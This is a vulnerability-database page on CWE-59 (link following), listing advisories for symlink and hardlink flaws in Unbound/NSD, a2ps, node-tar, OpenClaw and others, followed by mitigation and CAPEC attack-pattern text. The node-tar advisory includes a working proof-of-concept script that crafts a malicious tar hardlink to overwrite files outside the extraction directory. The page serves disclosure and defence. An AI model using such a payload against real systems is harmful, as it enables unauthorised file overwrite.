Common Weakness Enumeration

CWE-59

Allowed

Improper Link Resolution Before File Access ('Link Following')

Abstraction: Base · Status: Draft

The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

1987 vulnerabilities reference this CWE, most recent first.

GHSA-Q92F-7CWJ-W4W5

Vulnerability from github – Published: 2022-05-24 17:35 – Updated: 2022-10-12 19:00
VLAI
Details

NLnet Labs Unbound, up to and including version 1.12.0, and NLnet Labs NSD, up to and including version 4.3.3, contain a local vulnerability that would allow for a local symlink attack. When writing the PID file, Unbound and NSD create the file if it is not there, or open an existing file for writing. In case the file was already present, they would follow symlinks if the file happened to be a symlink instead of a regular file. An additional chown of the file would then take place after it was written, making the user Unbound/NSD is supposed to run as the new owner of the file. If an attacker has local access to the user Unbound/NSD runs as, she could create a symlink in place of the PID file pointing to a file that she would like to erase. If then Unbound/NSD is killed and the PID file is not cleared, upon restarting with root privileges, Unbound/NSD will rewrite any file pointed at by the symlink. This is a local vulnerability that could create a Denial of Service of the system Unbound/NSD is running on. It requires an attacker having access to the limited permission user Unbound/NSD runs as and point through the symlink to a critical file on the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-28935"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-07T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "NLnet Labs Unbound, up to and including version 1.12.0, and NLnet Labs NSD, up to and including version 4.3.3, contain a local vulnerability that would allow for a local symlink attack. When writing the PID file, Unbound and NSD create the file if it is not there, or open an existing file for writing. In case the file was already present, they would follow symlinks if the file happened to be a symlink instead of a regular file. An additional chown of the file would then take place after it was written, making the user Unbound/NSD is supposed to run as the new owner of the file. If an attacker has local access to the user Unbound/NSD runs as, she could create a symlink in place of the PID file pointing to a file that she would like to erase. If then Unbound/NSD is killed and the PID file is not cleared, upon restarting with root privileges, Unbound/NSD will rewrite any file pointed at by the symlink. This is a local vulnerability that could create a Denial of Service of the system Unbound/NSD is running on. It requires an attacker having access to the limited permission user Unbound/NSD runs as and point through the symlink to a critical file on the system.",
  "id": "GHSA-q92f-7cwj-w4w5",
  "modified": "2022-10-12T19:00:39Z",
  "published": "2022-05-24T17:35:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28935"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2021/02/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00024.html"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202101-38"
    },
    {
      "type": "WEB",
      "url": "https://www.nlnetlabs.nl/downloads/nsd/CVE-2020-28935.txt"
    },
    {
      "type": "WEB",
      "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2020-28935.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q93Q-4MXV-67MP

Vulnerability from github – Published: 2022-04-30 18:18 – Updated: 2022-04-30 18:18
VLAI
Details

The tempname_ensure function in lib/routines.h in a2ps 4.14 and earlier, as used by the spy_user function and possibly other functions, allows local users to modify arbitrary files via a symlink attack on a temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2001-1593"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-04-05T21:55:00Z",
    "severity": "LOW"
  },
  "details": "The tempname_ensure function in lib/routines.h in a2ps 4.14 and earlier, as used by the spy_user function and possibly other functions, allows local users to modify arbitrary files via a symlink attack on a temporary file.",
  "id": "GHSA-q93q-4mxv-67mp",
  "modified": "2022-04-30T18:18:19Z",
  "published": "2022-04-30T18:18:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2001-1593"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737385"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1060630"
    },
    {
      "type": "WEB",
      "url": "http://pkgs.fedoraproject.org/cgit/a2ps.git/plain/a2ps-4.13-security.patch"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/oss-sec/2014/q1/237"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/oss-sec/2014/q1/253"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/oss-sec/2014/q1/257"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2014/dsa-2892"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-Q94X-HHMW-P4M8

Vulnerability from github – Published: 2022-04-30 18:23 – Updated: 2022-04-30 18:23
VLAI
Details

Unspecified vulnerability in pprosetup in Sun PatchPro 2.0 has unknown impact and attack vectors related to "unsafe use of temporary files."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2002-2374"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-362",
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2002-12-31T05:00:00Z",
    "severity": "HIGH"
  },
  "details": "Unspecified vulnerability in pprosetup in Sun PatchPro 2.0 has unknown impact and attack vectors related to \"unsafe use of temporary files.\"",
  "id": "GHSA-q94x-hhmw-p4m8",
  "modified": "2022-04-30T18:23:03Z",
  "published": "2022-04-30T18:23:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2002-2374"
    },
    {
      "type": "WEB",
      "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-21-113176-01-1\u0026searchclause=113176"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/5540"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-Q96Q-H836-9Q4H

Vulnerability from github – Published: 2022-09-29 00:00 – Updated: 2022-10-01 00:00
VLAI
Details

Armoury Crate Service’s logging function has insufficient validation to check if the log file is a symbolic link. A physical attacker with general user privilege can modify the log file property to a symbolic link that points to arbitrary system file, causing the logging function to overwrite the system file and disrupt the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-38699"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-28T04:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Armoury Crate Service\u2019s logging function has insufficient validation to check if the log file is a symbolic link. A physical attacker with general user privilege can modify the log file property to a symbolic link that points to arbitrary system file, causing the logging function to overwrite the system file and disrupt the system.",
  "id": "GHSA-q96q-h836-9q4h",
  "modified": "2022-10-01T00:00:24Z",
  "published": "2022-09-29T00:00:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38699"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-6522-4eacb-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q9WC-HHM5-FJQ7

Vulnerability from github – Published: 2026-05-29 00:38 – Updated: 2026-05-29 00:38
VLAI
Details

Improper handling of symbolic links in the installer of My Image Garden for macOS Version 3.6.8 or earlier may allow a local attacker with login privileges to exploit a specially crafted symbolic link during installation to modify permissions of files for which they would not normally have authorization.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-6891"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-29T00:16:15Z",
    "severity": "MODERATE"
  },
  "details": "Improper handling of symbolic links in the installer of My Image Garden for macOS Version 3.6.8 or earlier may allow a local attacker with login privileges to exploit a specially crafted symbolic link during installation to modify permissions of files for which they would not normally have authorization.",
  "id": "GHSA-q9wc-hhm5-fjq7",
  "modified": "2026-05-29T00:38:39Z",
  "published": "2026-05-29T00:38:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6891"
    },
    {
      "type": "WEB",
      "url": "https://canon.jp/support/support-info/260528-2vulnerability-response"
    },
    {
      "type": "WEB",
      "url": "https://psirt.canon/advisory-information/cp2026-004"
    },
    {
      "type": "WEB",
      "url": "https://www.canon-europe.com/support/product-security"
    },
    {
      "type": "WEB",
      "url": "https://www.usa.canon.com/support/canon-product-advisories/CPA2026-004-Vulnerability-Remediation-for-My-Image-Garden-for-macOS-and-CUPS-Printer-Driver-for-macOS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-QC66-3Q9C-GRV6

Vulnerability from github – Published: 2025-03-23 18:30 – Updated: 2025-03-23 18:30
VLAI
Details

Improper link resolution before file access ('link following') in Microsoft Edge (Chromium-based) allows an authorized attacker to elevate privileges locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-29795"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-23T17:15:28Z",
    "severity": "HIGH"
  },
  "details": "Improper link resolution before file access (\u0027link following\u0027) in Microsoft Edge (Chromium-based) allows an authorized attacker to elevate privileges locally.",
  "id": "GHSA-qc66-3q9c-grv6",
  "modified": "2025-03-23T18:30:28Z",
  "published": "2025-03-23T18:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29795"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29795"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QCC4-P59M-P54M

Vulnerability from github – Published: 2026-03-12 14:21 – Updated: 2026-03-12 14:21
VLAI
Summary
OpenClaw: Sandbox dangling-symlink alias handling could bypass workspace-only write boundary
Details

Summary

A sandbox boundary-validation gap in symlink alias handling allowed certain workspace-only write paths to be treated as in-boundary even when they could resolve outside the workspace/sandbox root.

Affected Packages / Versions

  • Package: npm openclaw
  • Affected versions: <= 2026.2.25
  • Latest published npm version included in affected range: 2026.2.25 (checked on February 26, 2026)
  • Patched version (pre-set for release): 2026.2.26

Technical Details

In affected versions, dangling symlink hops could be accepted during boundary checks under missing-target conditions. For workspace-only write flows (including apply_patch), this could allow writes to resolve outside the configured workspace/sandbox boundary.

The fix resolves symlink targets through existing ancestors and fails closed when canonical resolution escapes the configured boundary.

Impact

  • Boundary-confined write operations could be redirected outside the configured workspace/sandbox root.
  • Primary impact is integrity of host-side files reachable from that path resolution.

Fix Commit(s)

  • 4fd29a35bb85a1898ebff518364c467058b50e14

Release Process Note

patched_versions is pre-set to the planned next release (2026.2.26) so once npm 2026.2.26 is published, the advisory can be published without further field edits.

Thanks @tdjackey for reporting.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.2.25"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-367",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-12T14:21:54Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nA sandbox boundary-validation gap in symlink alias handling allowed certain workspace-only write paths to be treated as in-boundary even when they could resolve outside the workspace/sandbox root.\n\n### Affected Packages / Versions\n- Package: npm `openclaw`\n- Affected versions: `\u003c= 2026.2.25`\n- Latest published npm version included in affected range: `2026.2.25` (checked on February 26, 2026)\n- Patched version (pre-set for release): `2026.2.26`\n\n### Technical Details\nIn affected versions, dangling symlink hops could be accepted during boundary checks under missing-target conditions. For workspace-only write flows (including `apply_patch`), this could allow writes to resolve outside the configured workspace/sandbox boundary.\n\nThe fix resolves symlink targets through existing ancestors and fails closed when canonical resolution escapes the configured boundary.\n\n### Impact\n- Boundary-confined write operations could be redirected outside the configured workspace/sandbox root.\n- Primary impact is integrity of host-side files reachable from that path resolution.\n\n### Fix Commit(s)\n- `4fd29a35bb85a1898ebff518364c467058b50e14`\n\n### Release Process Note\n`patched_versions` is pre-set to the planned next release (`2026.2.26`) so once npm `2026.2.26` is published, the advisory can be published without further field edits.\n\nThanks @tdjackey for reporting.",
  "id": "GHSA-qcc4-p59m-p54m",
  "modified": "2026-03-12T14:21:54Z",
  "published": "2026-03-12T14:21:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc4-p59m-p54m"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/4fd29a35bb85a1898ebff518364c467058b50e14"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenClaw: Sandbox dangling-symlink alias handling could bypass workspace-only write boundary"
}

GHSA-QF6R-HR4R-92VR

Vulnerability from github – Published: 2022-04-29 01:27 – Updated: 2024-02-16 21:31
VLAI
Details

Pedestal Software Integrity Protection Driver (IPD) 1.3 and earlier allows privileged attackers, such as rootkits, to bypass file access restrictions to the Windows kernel by using the NtCreateSymbolicLinkObject function to create a symbolic link to (1) \Device\PhysicalMemory or (2) to a drive letter using the subst command.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2003-1233"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2003-12-31T05:00:00Z",
    "severity": "LOW"
  },
  "details": "Pedestal Software Integrity Protection Driver (IPD) 1.3 and earlier allows privileged attackers, such as rootkits, to bypass file access restrictions to the Windows kernel by using the NtCreateSymbolicLinkObject function to create a symbolic link to (1) \\Device\\PhysicalMemory or (2) to a drive letter using the subst command.",
  "id": "GHSA-qf6r-hr4r-92vr",
  "modified": "2024-02-16T21:31:29Z",
  "published": "2022-04-29T01:27:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2003-1233"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/10979"
    },
    {
      "type": "WEB",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2003-01/0017.html"
    },
    {
      "type": "WEB",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2003-01/0018.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/7816"
    },
    {
      "type": "WEB",
      "url": "http://www.phrack.org/show.php?p=59\u0026a=16"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/6511"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QFFP-2RHF-9H96

Vulnerability from github – Published: 2026-03-05 00:52 – Updated: 2026-03-09 15:49
VLAI
Summary
tar has Hardlink Path Traversal via Drive-Relative Linkpath
Details

Summary

tar (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIPABSOLUTEPATH] checks for .. segments before stripping absolute roots.

What happens with linkpath: "C:../target.txt": 1. Split on / gives ['C:..', 'target.txt'], so parts.includes('..') is false. 2. stripAbsolutePath() removes C: and rewrites the value to ../target.txt. 3. Hardlink creation resolves this against extraction cwd and escapes one directory up. 4. Writing through the extracted hardlink overwrites the outside file.

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.

PoC

Tested on Arch Linux with tar@7.5.9.

PoC script (poc.cjs):

const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(process.cwd(), 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Run:

cd test-workspace
node poc.cjs && ls -l ../target.txt

Observed output:

PWNED
-rw-r--r-- 2 joshuavr joshuavr 6 Mar  4 19:25 ../target.txt

PWNED confirms outside file content overwrite. Link count 2 confirms the extracted file and ../target.txt are hardlinked.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios: - CLI tools unpacking untrusted tarballs into a working directory - build/update pipelines consuming third-party archives - services that import user-supplied tar files

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.5.9"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29786"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T00:52:32Z",
    "nvd_published_at": "2026-03-07T16:15:55Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.\n\n### Details\nThe extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments *before* stripping absolute roots.\n\nWhat happens with `linkpath: \"C:../target.txt\"`:\n1. Split on `/` gives `[\u0027C:..\u0027, \u0027target.txt\u0027]`, so `parts.includes(\u0027..\u0027)` is false.\n2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`.\n3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up.\n4. Writing through the extracted hardlink overwrites the outside file.\n\nThis is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.\n\n### PoC\nTested on Arch Linux with `tar@7.5.9`.\n\nPoC script (`poc.cjs`):\n\n```js\nconst fs = require(\u0027fs\u0027)\nconst path = require(\u0027path\u0027)\nconst { Header, x } = require(\u0027tar\u0027)\n\nconst cwd = process.cwd()\nconst target = path.resolve(cwd, \u0027..\u0027, \u0027target.txt\u0027)\nconst tarFile = path.join(process.cwd(), \u0027poc.tar\u0027)\n\nfs.writeFileSync(target, \u0027ORIGINAL\\n\u0027)\n\nconst b = Buffer.alloc(1536)\nnew Header({ path: \u0027l\u0027, type: \u0027Link\u0027, linkpath: \u0027C:../target.txt\u0027 }).encode(b, 0)\nfs.writeFileSync(tarFile, b)\n\nx({ cwd, file: tarFile }).then(() =\u003e {\n  fs.writeFileSync(path.join(cwd, \u0027l\u0027), \u0027PWNED\\n\u0027)\n  process.stdout.write(fs.readFileSync(target, \u0027utf8\u0027))\n})\n```\n\nRun:\n\n```bash\ncd test-workspace\nnode poc.cjs \u0026\u0026 ls -l ../target.txt\n```\n\nObserved output:\n\n```text\nPWNED\n-rw-r--r-- 2 joshuavr joshuavr 6 Mar  4 19:25 ../target.txt\n```\n\n`PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked.\n\n### Impact\nThis is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.\n\nRealistic scenarios:\n- CLI tools unpacking untrusted tarballs into a working directory\n- build/update pipelines consuming third-party archives\n- services that import user-supplied tar files",
  "id": "GHSA-qffp-2rhf-9h96",
  "modified": "2026-03-09T15:49:59Z",
  "published": "2026-03-05T00:52:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "tar has Hardlink Path Traversal via Drive-Relative Linkpath"
}

GHSA-QFGM-7W83-8RMH

Vulnerability from github – Published: 2022-05-13 01:38 – Updated: 2022-05-13 01:38
VLAI
Details

A vulnerability in the web-based UI of Cisco Unified Communications Manager could allow an unauthenticated, remote attacker to execute a cross-frame scripting (XFS) attack. The vulnerability exists because the affected software does not provide sufficient protections for HTML inline frames (iframes). An attacker could exploit this vulnerability by directing a user of the affected software to an attacker-controlled web page that contains a malicious HTML inline frame. A successful exploit could allow the attacker to conduct click-jacking or other types of client-side browser attacks. Cisco Bug IDs: CSCve60993.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-12258"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59",
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-10-05T07:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the web-based UI of Cisco Unified Communications Manager could allow an unauthenticated, remote attacker to execute a cross-frame scripting (XFS) attack. The vulnerability exists because the affected software does not provide sufficient protections for HTML inline frames (iframes). An attacker could exploit this vulnerability by directing a user of the affected software to an attacker-controlled web page that contains a malicious HTML inline frame. A successful exploit could allow the attacker to conduct click-jacking or other types of client-side browser attacks. Cisco Bug IDs: CSCve60993.",
  "id": "GHSA-qfgm-7w83-8rmh",
  "modified": "2022-05-13T01:38:00Z",
  "published": "2022-05-13T01:38:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12258"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171004-ucm"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/101172"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1039505"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-48.1
Architecture and Design

Strategy: Separation of Privilege

  • Follow the principle of least privilege when assigning access rights to entities in a software system.
  • Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack

An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.

CAPEC-17: Using Malicious Files

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.